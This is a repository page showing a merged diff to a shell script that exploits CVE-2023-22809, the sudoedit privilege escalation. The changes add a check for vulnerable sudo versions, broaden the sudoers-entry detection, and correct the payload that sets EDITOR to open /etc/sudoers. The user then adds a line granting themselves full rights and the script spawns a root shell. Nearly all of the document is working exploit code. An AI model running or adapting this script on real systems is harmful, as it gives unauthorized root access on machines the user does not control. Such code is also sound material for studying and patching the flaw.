n3m1sys/CVE-2023-22809-sudoedit-privesc
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge pull request #1 from r3nt0n/main

Browse Source 
Fixing bugs and improving checks
This commit is contained in:
Martín
2023-02-03 13:03:07 +01:00
committed by GitHub
parent 0e1fda22d3 e6fca2453f
commit 26ce1999d3
1 changed files with 12 additions and 3 deletions
Download Patch File Download Diff File Expand all files Collapse all files

15
exploit.sh
View File

@@ -18,15 +18,24 @@
# attacker to add a line to gain privileges on all the files and get a root # attacker to add a line to gain privileges on all the files and get a root
# shell. # shell.
EXPLOITABLE=$(sudo -l | grep -E "sudoedit|sudo -e" | grep -E "(root)" | cut -d ' ' -f 6-) if ! sudo --version | head -1 | grep -qE '(1\.8.*|1\.9\.[0-9]1?(p[1-3])?|1\.9\.12p1)$'
then
echo "> Currently installed sudo version is not vulnerable"
exit 1
fi
EXPLOITABLE=$(sudo -l | grep -E "sudoedit|sudo -e" | grep -E '\(root\)|\(ALL\)|\(ALL : ALL\)' | cut -d ')' -f 2-)
if [ -z "$EXPLOITABLE" ]; then if [ -z "$EXPLOITABLE" ]; then
echo "> This user can't run sudoedit as root" echo "> It doesn't seem that this user can run sudoedit as root"
read -p "Do you want to proceed anyway? (y/N): " confirm && [[ $confirm == [yY] ]] || exit 2
else else
echo "> BINGO! User exploitable" echo "> BINGO! User exploitable"
echo "> Opening sudoers file, please add the following line to the file in order to do the privesc:" echo "> Opening sudoers file, please add the following line to the file in order to do the privesc:"
echo "$USER ALL=(ALL:ALL) ALL" echo "$USER ALL=(ALL:ALL) ALL"
read -n 1 -s -r -p "Press any key to continue..." read -n 1 -s -r -p "Press any key to continue..."
EDITOR = "vim -- /etc/suoders" $EXPLOITABLE EDITOR="vim -- /etc/sudoers" $EXPLOITABLE
sudo su root sudo su root
exit 0
fi fi